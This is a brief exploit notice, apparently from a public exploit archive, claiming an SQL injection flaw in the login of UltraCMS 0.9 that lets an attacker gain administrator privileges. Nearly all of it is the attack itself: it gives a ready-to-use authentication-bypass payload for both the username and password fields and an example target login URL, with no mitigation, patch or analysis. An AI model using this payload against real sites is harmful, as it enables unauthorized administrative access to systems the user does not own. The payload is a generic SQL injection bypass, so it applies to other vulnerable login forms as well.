product:UltraCMS 0.9
there is an sql injection problem in UltraCMS 0.9 and it can be exploited to gain admin privileges.
exploit: user: 'or''=' pass: 'or''='
example : http://www.target.com/include/index.php
thx